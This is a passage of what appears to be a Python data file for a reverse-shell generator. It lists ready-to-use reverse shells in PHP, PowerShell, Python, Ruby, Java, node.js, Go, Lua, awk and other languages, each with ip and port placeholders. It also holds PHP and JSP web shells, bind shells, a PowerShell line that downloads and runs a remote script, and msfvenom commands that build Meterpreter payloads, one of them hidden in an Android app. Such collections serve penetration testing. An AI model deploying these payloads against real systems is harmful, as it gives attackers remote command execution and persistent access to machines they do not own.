$streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET\n                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET\n                            } else if ($this->os === 'WINDOWS') {\n                                // order is important\n                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN\n                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET\n                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET\n                            }\n                        }\n                    } while (!$this->error);\n                    // ------ WORK END ------\n\n                    foreach ($pipes as $pipe) {\n                        fclose($pipe);\n                    }\n                    proc_close($process);\n                }\n                // ------ SHELL END ------\n\n                fclose($socket);\n            }\n            // ------ SOCKET END ------\n\n        }\n    }\n}\necho '<pre>';\n// change the host address and/or port number as necessary\n$sh = new Shell('{ip}', {port});\n$sh->run();\nunset($sh);\n// garbage collector requires PHP v5.3.0 or greater\n// @gc_collect_cycles();\necho '</pre>';\n?>",
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP cmd",
        "command": '<html>\n<body>\n<form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>">\n<input type="TEXT" name="cmd" id="cmd" size="80">\n<input type="SUBMIT" value="Execute">\n<\/form>\n<pre>\n<?php\n    if(isset($_GET[\'cmd\']))\n    {\n        system($_GET[\'cmd\']);\n    }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById("cmd").focus();<\/script>\n<\/html>',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP cmd 2",
        "command": "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"<\/pre>\"; die; }?>",
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP cmd small",
        "command": "<?=`$_GET[0]`?>",
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP exec",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});exec("{shell} <&3 >&3 2>&3");\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "PHP shell_exec",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});shell_exec("{shell} <&3 >&3 2>&3");\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "PHP system",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});system("{shell} <&3 >&3 2>&3");\'',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP passthru",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});passthru("{shell} <&3 >&3 2>&3");\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "PHP `",
        "command": "php -r '$sock=fsockopen(\"{ip}\",{port});`{shell} <&3 >&3 2>&3`;'",
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP popen",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});popen("{shell} <&3 >&3 2>&3", "r");\'',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP proc_open",
        "command": 'php -r \'$sock=fsockopen("{ip}",{port});$proc=proc_open("{shell}", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\'',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "Windows ConPty",
        "command": "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell #1",
        "command": '$LHOST = "{ip}"; $LPORT = {port}; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()',
        "meta": ["windows"],
    },
    {
        "name": "PowerShell #2",
        "command": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell #3",
        "command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell #4 (TLS)",
        "command": "$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()",
        "meta": ["windows"],
    },
    {
        "name": "Python #1",
        "command": 'export RHOST="{ip}";export RPORT={port};python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("{shell}")\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Python #2",
        "command": 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("{shell}")\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Python3 #1",
        "command": 'export RHOST="{ip}";export RPORT={port};python3 -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("{shell}")\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Python3 #2",
        "command": 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("{shell}")\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Python3 #3",
        "command": 'import os,socket,subprocess,threading;\ndef s2p(s, p):\n    while True:\n        data = s.recv(1024)\n        if len(data) > 0:\n            p.stdin.write(data)\n            p.stdin.flush()\n\ndef p2s(s, p):\n    while True:\n        s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("{ip}",{port}))\n\np=subprocess.Popen(["{shell}"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n    p.wait()\nexcept KeyboardInterrupt:\n    s.close()',
        "meta": ["windows"],
    },
    {
        "name": "Python3 #4",
        "command": 'python3 -c \'import os,pty,socket;s=socket.socket();s.connect(("{ip}",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("{shell}")\'',
        "meta": ["linux"],
    },
    {
        "name": "Ruby #1",
        "command": 'ruby -rsocket -e\'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{ip}",{port}))\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Ruby no sh",
        "command": 'ruby -rsocket -e\'exit if fork;c=TCPSocket.new("{ip}","{port}");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "socat #1",
        "command": "socat TCP:{ip}:{port} EXEC:{shell}",
        "meta": ["linux", "mac"],
    },
    {
        "name": "socat #2 (TTY)",
        "command": "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane",
        "meta": ["linux", "mac"],
    },
    {
        "name": "sqlite3 nc mkfifo",
        "command": "sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'",
        "meta": ["linux", "mac"],
    },
    {
        "name": "node.js",
        "command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
        "meta": ["linux", "mac"],
    },
    {
        "name": "node.js #2",
        "command": '(function(){\r\n    var net = require("net"),\r\n        cp = require("child_process"),\r\n        sh = cp.spawn("\{shell}", []);\r\n    var client = new net.Socket();\r\n    client.connect({port}, "{ip}", function(){\r\n        client.pipe(sh.stdin);\r\n        sh.stdout.pipe(client);\r\n        sh.stderr.pipe(client);\r\n    });\r\n    return \/a\/; \/\/ Prevents the Node.js application from crashing\r\n})();',
        "meta": ["linux", "mac", "windows"],
    },
    {
        "name": "Java #1",
        "command": 'public class shell {\n    public static void main(String[] args) {\n        Process p;\n        try {\n            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1");\n            p.waitFor();\n            p.destroy();\n        } catch (Exception e) {}\n    }\n}',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Java #2",
        "command": 'public class shell {\n    public static void main(String[] args) {\n        ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/{ip}/{port} 0>&1")\n            .redirectErrorStream(true);\n        try {\n            Process p = pb.start();\n            p.waitFor();\n            p.destroy();\n        } catch (Exception e) {}\n    }\n}',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Java #3",
        "command": 'import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n    public static void main(String[] args) {\n        String host = "{ip}";\n        int port = {port};\n        String cmd = "{shell}";\n        try {\n            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n            Socket s = new Socket(host, port);\n            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n            OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n            while (!s.isClosed()) {\n                while (pi.available() > 0)\n                    so.write(pi.read());\n                while (pe.available() > 0)\n                    so.write(pe.read());\n                while (si.available() > 0)\n                    po.write(si.read());\n                so.flush();\n                po.flush();\n                Thread.sleep(50);\n                try {\n                    p.exitValue();\n                    break;\n                } catch (Exception e) {}\n            }\n            p.destroy();\n            s.close();\n        } catch (Exception e) {}\n    }\n}',
        "meta": ["windows", "linux", "mac"],
    },
    {
        "name": "Java Web",
        "command": '<%@\r\npage import="java.lang.*, java.util.*, java.io.*, java.net.*"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n        InputStream is;\r\n        OutputStream os;\r\n        StreamConnector(InputStream is, OutputStream os)\r\n        {\r\n                this.is = is;\r\n                this.os = os;\r\n        }\r\n        public void run()\r\n        {\r\n                BufferedReader isr = null;\r\n                BufferedWriter osw = null;\r\n                try\r\n                {\r\n                        isr = new BufferedReader(new InputStreamReader(is));\r\n                        osw = new BufferedWriter(new OutputStreamWriter(os));\r\n                        char buffer[] = new char[8192];\r\n                        int lenRead;\r\n                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n                        {\r\n                                osw.write(buffer, 0, lenRead);\r\n                                osw.flush();\r\n                        }\r\n                }\r\n                catch (Exception ioe)\r\n                try\r\n                {\r\n                        if(isr != null) isr.close();\r\n                        if(osw != null) osw.close();\r\n                }\r\n                catch (Exception ioe)\r\n        }\r\n}\r\n%>\r\n\r\n<h1>JSP Backdoor Reverse Shell<\/h1>\r\n\r\n<form method="post">\r\nIP Address\r\n<input type="text" name="ipaddress" size=30>\r\nPort\r\n<input type="text" name="port" size=10>\r\n<input type="submit" name="Connect" value="Connect">\r\n<\/form>\r\n<p>\r\n<hr>\r\n\r\n<%\r\nString ipAddress = request.getParameter("ipaddress");\r\nString ipPort = request.getParameter("port");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n        Socket sock = null;\r\n        try\r\n        {\r\n                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n                Runtime rt = Runtime.getRuntime();\r\n                Process proc = rt.exec("cmd.exe");\r\n                StreamConnector outputConnector =\r\n                        new StreamConnector(proc.getInputStream(),\r\n                                          sock.getOutputStream());\r\n                StreamConnector inputConnector =\r\n                        new StreamConnector(sock.getInputStream(),\r\n                                          proc.getOutputStream());\r\n                outputConnector.start();\r\n                inputConnector.start();\r\n        }\r\n        catch(Exception e) \r\n}\r\n%>',
        "meta": ["windows", "linux", "mac"],
    },
    {
        "name": "Java Two Way",
        "command": '<%\r\n    \/*\r\n     * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n     * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n     * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button "send" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n     * the command specified in the HTML form). This is to avoid to keep it simple.\r\n     *\/\r\n%>\r\n\r\n<%@page import="java.lang.*"%>\r\n<%@page import="java.io.*"%>\r\n<%@page import="java.net.*"%>\r\n<%@page import="java.util.*"%>\r\n\r\n<html>\r\n<head>\r\n    <title>jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD="POST" NAME="myform" ACTION="">\r\n    <input TYPE="text" NAME="shell">\r\n    <input TYPE="submit" VALUE="Send">\r\n<\/form>\r\n<pre>\r\n<%\r\n    \/\/ Define the OS\r\n    String shellPath = null;\r\n    try\r\n    {\r\n        if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {\r\n            shellPath = new String("\/bin\/sh");\r\n        } else {\r\n            shellPath = new String("cmd.exe");\r\n        }\r\n    } catch( Exception e ){}\r\n    \/\/ INNER HTML PART\r\n    if (request.getParameter("shell") != null) {\r\n        out.println("Command: " + request.getParameter("shell") + "\\n<BR>");\r\n        Process p;\r\n        if (shellPath.equals("cmd.exe"))\r\n            p = Runtime.getRuntime().exec("cmd.exe \/c " + request.getParameter("shell"));\r\n        else\r\n            p = Runtime.getRuntime().exec("\/bin\/sh -c " + request.getParameter("shell"));\r\n        OutputStream os = p.getOutputStream();\r\n        InputStream in = p.getInputStream();\r\n        DataInputStream dis = new DataInputStream(in);\r\n        String disr = dis.readLine();\r\n        while ( disr != null ) {\r\n            out.println(disr);\r\n            disr = dis.readLine();\r\n        }\r\n    }\r\n    \/\/ TCP PORT PART\r\n    class StreamConnector extends Thread\r\n    {\r\n        InputStream wz;\r\n        OutputStream yr;\r\n        StreamConnector( InputStream wz, OutputStream yr ) {\r\n            this.wz = wz;\r\n            this.yr = yr;\r\n        }\r\n        public void run()\r\n        {\r\n            BufferedReader r  = null;\r\n            BufferedWriter w = null;\r\n            try\r\n            {\r\n                r  = new BufferedReader(new InputStreamReader(wz));\r\n                w = new BufferedWriter(new OutputStreamWriter(yr));\r\n                char buffer[] = new char[8192];\r\n                int length;\r\n                while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n                {\r\n                    w.write( buffer, 0, length );\r\n                    w.flush();\r\n                }\r\n            } catch( Exception e ){}\r\n            try\r\n            {\r\n                if( r != null )\r\n                    r.close();\r\n                if( w != null )\r\n                    w.close();\r\n            } catch( Exception e ){}\r\n        }\r\n    }\r\n \r\n    try {\r\n        Socket socket = new Socket( "{ip}", {port} ); \/\/ Replace with wanted ip and port\r\n        Process process = Runtime.getRuntime().exec( shellPath );\r\n        new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n        new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n        out.println("port opened on " + socket);\r\n     } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>',
        "meta": ["windows", "linux", "mac"],
    },
    {
        "name": "Javascript",
        "command": 'String command = "var host = \'{ip}\';" +\r\n                       "var port = {port};" +\r\n                       "var cmd = \'{shell}\';"+\r\n                       "var s = new java.net.Socket(host, port);" +\r\n                       "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+\r\n                       "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+\r\n                       "var po = p.getOutputStream(), so = s.getOutputStream();"+\r\n                       "print (\'Connected\');"+\r\n                       "while (!s.isClosed()) {"+\r\n                       "    while (pi.available() > 0)"+\r\n                       "        so.write(pi.read());"+\r\n                       "    while (pe.available() > 0)"+\r\n                       "        so.write(pe.read());"+\r\n                       "    while (si.available() > 0)"+\r\n                       "        po.write(si.read());"+\r\n                       "    so.flush();"+\r\n                       "    po.flush();"+\r\n                       "    java.lang.Thread.sleep(50);"+\r\n                       "    try {"+\r\n                       "        p.exitValue();"+\r\n                       "        break;"+\r\n                       "    }"+\r\n                       "    catch (e) {"+\r\n                       "    }"+\r\n                       "}"+\r\n                       "p.destroy();"+\r\n                       "s.close();";\r\nString x = "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"JavaScript\\").eval(\\""+command+"\\")";\r\nref.add(new StringRefAddr("x", x);',
        "meta": ["linux", "mac", "windows"],
    },
    {
        "name": "Groovy",
        "command": 'String host="{ip}";int port={port};String cmd="{shell}";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();',
        "meta": ["windows"],
    },
    {
        "name": "telnet",
        "command": "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF",
        "meta": ["linux", "mac"],
    },
    {
        "name": "zsh",
        "command": "zsh -c 'zmodload zsh/net/tcp && ztcp {ip} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Lua #1",
        "command": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{ip}','{port}');os.execute('{shell} -i <&3 >&3 2>&3');\"",
        "meta": ["linux"],
    },
    {
        "name": "Lua #2",
        "command": 'lua5.1 -e \'local host, port = "{ip}", {port} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()\'',
        "meta": ["linux", "windows"],
    },
    {
        "name": "Go",
        "command": 'echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{ip}:{port}");cmd:=exec.Command("{shell}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go',
        "meta": ["linux", "mac", "windows"],
    },
    {
        "name": "Vlang",
        "command": "echo 'import os' > /tmp/t.v && echo 'fn main() { os.system(\"nc -e {shell} {ip} {port} 0>&1\") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Awk",
        "command": 'awk \'BEGIN {s = "/inet/tcp/0/{ip}/{port}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Dart",
        "command": "import 'dart:io';\nimport 'dart:convert';\n\nmain() {\n  Socket.connect(\"{ip}\", {port}).then((socket) {\n    socket.listen((data) {\n      Process.start('{shell}', []).then((Process process) {\n        process.stdin.writeln(new String.fromCharCodes(data).trim());\n        process.stdout\n          .transform(utf8.decoder)\n          .listen((output) { socket.write(output); });\n      });\n    },\n    onDone: () {\n      socket.destroy();\n    });\n  });\n}",
        "meta": ["linux", "mac", "windows"],
    },
    {
        "name": "Crystal (system)",
        "command": 'crystal eval \'require "process";require "socket";c=Socket.tcp(Socket::Family::INET);c.connect("{ip}",{port});loop{m,l=c.receive;p=Process.new(m.rstrip("\\n"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}\'',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "Crystal (code)",
        "command": 'require "process"\nrequire "socket"\n\nc = Socket.tcp(Socket::Family::INET)\nc.connect("{ip}", {port})\nloop do \n  m, l = c.receive\n  p = Process.new(m.rstrip("\\n"), output:Process::Redirect::Pipe, shell:true)\n  c << p.output.gets_to_end\nend',
        "meta": ["linux", "mac"],
    },
]

bind_shell = [
    {
        "name": "Python3 Bind",
        "command": 'python3 -c \'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")\'',
        "meta": ["bind", "mac", "linux", "windows"],
    },
    {
        "name": "PHP Bind",
        "command": 'php -r \'$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",{port});\socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}\'',
        "meta": ["bind", "mac", "linux", "windows"],
    },
    {
        "name": "nc Bind",
        "command": "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 {port} > /tmp/f",
        "meta": ["bind", "mac", "linux"],
    },
    {
        "name": "Perl Bind",
        "command": 'perl -e \'use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/sh -i");};\'',
        "meta": ["bind", "mac", "linux"],
    },
]

msfvenom = [
    {
        "name": "Windows Meterpreter Staged Reverse TCP (x64)",
        "command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
        "meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"],
    },
    {
        "name": "Windows Meterpreter Stageless Reverse TCP (x64)",
        "command": "msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
        "meta": ["msfvenom", "windows", "stageless", "reverse"],
    },
    {
        "name": "Windows Staged Reverse TCP (x64)",
        "command": "msfvenom -p windows/x64/shell/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
        "meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"],
    },
    {
        "name": "Windows Stageless Reverse TCP (x64)",
        "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
        "meta": ["msfvenom", "windows", "stageless", "reverse"],
    },
    {
        "name": "Windows Staged JSP Reverse TCP",
        "command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f jsp -o ./rev.jsp",
        "meta": ["msfvenom", "windows", "staged", "reverse"],
    },
    {
        "name": "Linux Meterpreter Staged Reverse TCP (x64)",
        "command": "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf",
        "meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"],
    },
    {
        "name": "Linux Stageless Reverse TCP (x64)",
        "command": "msfvenom -p linux/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf",
        "meta": ["msfvenom", "linux", "meterpreter", "stageless", "reverse"],
    },
    {
        "name": "Windows Bind TCP ShellCode - BOF",
        "command": "msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf -o shellcode",
        "meta": ["msfvenom", "windows", "bind", "bufferoverflow"],
    },
    {
        "name": "macOS Meterpreter Staged Reverse TCP (x64)",
        "command": "msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho",
        "meta": ["msfvenom", "mac", "stageless", "reverse"],
    },
    {
        "name": "macOS Meterpreter Stageless Reverse TCP (x64)",
        "command": "msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho",
        "meta": ["msfvenom", "mac", "stageless", "reverse"],
    },
    {
        "name": "macOS Stageless Reverse TCP (x64)",
        "command": "msfvenom -p osx/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho",
        "meta": ["msfvenom", "mac", "stageless", "reverse"],
    },
    {
        "name": "PHP Meterpreter Stageless Reverse TCP",
        "command": "msfvenom -p php/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.php",
        "meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"],
    },
    {
        "name": "PHP Reverse PHP",
        "command": "msfvenom -p php/reverse_php LHOST={ip} LPORT={port} -o shell.php",
        "meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"],
    },
    {
        "name": "JSP Stageless Reverse TCP",
        "command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.jsp",
        "meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"],
    },
    {
        "name": "WAR Stageless Reverse TCP",
        "command": "msfvenom -p java/shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war",
        "meta": ["msfvenom", "windows", "linux", "stageless", "reverse"],
    },
    {
        "name": "Android Meterpreter Reverse TCP",
        "command": "msfvenom --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk",
        "meta": ["msfvenom", "android", "android", "reverse"],
    },
    {
        "name": "Android Meterpreter Embed Reverse TCP",
        "command": "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
        "meta": ["msfvenom", "android", "android", "reverse"],
    },
    {
        "name": "Apple iOS Meterpreter Reverse TCP Inline",
        "command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
        "meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"],
    },
    {
        "name": "Python Stageless Reverse TCP",
        "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw",
        "meta": ["msfvenom", "windows", "linux", "stageless", "reverse"],
    },
    {
        "name": "Bash Stageless Reverse TCP",
        "command": "msfvenom -p cmd/unix/reverse_bash LHOST={ip} LPORT={port} -f raw -o shell.sh",
        "meta": ["msfvenom", "linux", "macos", "stageless", "reverse"],
    },
]

shells = [
    "sh",
    "/bin/sh",
    "bash",
    "/bin/bash",
    "cmd",
    "powershell",
    "pwsh",
    "ash",
    "bsh",
    "csh",
    "ksh",
    "zsh",
